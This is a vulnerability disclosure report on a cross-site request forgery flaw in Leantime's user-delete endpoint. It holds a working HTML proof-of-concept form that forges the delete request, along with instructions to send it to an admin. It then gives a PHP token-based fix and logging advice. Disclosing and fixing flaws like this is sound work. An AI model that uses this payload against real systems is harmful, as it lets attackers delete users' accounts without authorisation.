Cross-Site Request Forgery (CSRF) in leantime/leantime
Reported on Aug 17th 2021
✍️ Description
CSRF on deleting a user. The user-delete endpoint (`/users/delUser/<id>`, POST) accepts the request without any CSRF token or other anti-CSRF check, so a forged cross-origin form submission is processed as if the logged-in admin had sent it.
🕵️♂️ Proof of Concept
Create an .html file (for example poc.html) and paste the following code into it. Change localhost to your domain or IP address.
<html><head>
<title>CSRF PoC</title>
</head><body>
<form action="http://localhost/users/delUser/2" method="POST">
<input type="text" name="del" value="Yes%252C+delete%2521" /><br />
<input type='submit' value='Go!' />
</form>
</body></html>
Send this file to an admin. When the admin opens the file and clicks the button, the user with id 2 is deleted instantly.
[Screenshot: the user list still shows two users before the PoC is opened.]
[Screenshot: the PoC page as seen by the admin before clicking.]
After clicking "Go!", the next screen shows the user list where the user with id 2 (test) no longer exists.
💥 Impact
This vulnerability allows deletion of a user account. If an attacker sends the admin the link and the admin clicks on it, the user is deleted instantly because there is no CSRF protection on the delete request. With this attack an attacker can delete arbitrary users.
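The root cause is a state-changing POST that is accepted on the strength of the session cookie alone. The following is an added example of the standard synchronizer-token fix, written for this report and not taken from Leantime's code base; the function names, the `csrf_token` field name and the `handle_del_user` handler are hypothetical, and only the vulnerable route from the report is assumed.

```php
<?php
// Added example (not Leantime's own code): a minimal synchronizer-token
// defence for a state-changing request such as the user-delete POST above.
// Function names and the handler layout are hypothetical.

// Defence in depth: a SameSite=Lax session cookie is not sent on cross-site
// POSTs at all, so the PoC form would not even carry the admin's session.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

// Return the per-session CSRF token, creating one on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        // 32 bytes from the OS CSPRNG, hex-encoded (64 characters)
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Render a hidden field to include in every state-changing form
// (e.g. the "Yes, delete!" confirmation form for /users/delUser/<id>).
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Constant-time comparison of the submitted token with the session token.
// A form hosted on another origin cannot read the victim's session token,
// so it cannot supply a matching value and fails this check.
function csrf_check(?string $submitted): bool
{
    if ($submitted === null || $submitted === '' || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// Hypothetical delete handler guarded by the check: the request must be a
// POST and must carry a valid token, otherwise it is rejected with 403.
function handle_del_user(int $userId): void
{
    if ($_SERVER['REQUEST_METHOD'] !== 'POST'
        || !csrf_check($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        echo 'Invalid or missing CSRF token';
        return;
    }
    // ... perform the actual deletion of $userId here ...
    echo "User $userId deleted";
}
```

With this in place the confirmation form emits `csrf_field()` alongside the existing `del` input, and the PoC page from the report receives a 403 because it cannot obtain the admin's session-bound token. Logging rejected requests (source IP, `Referer`/`Origin` header, target user id) gives defenders a signal that a forged request was attempted.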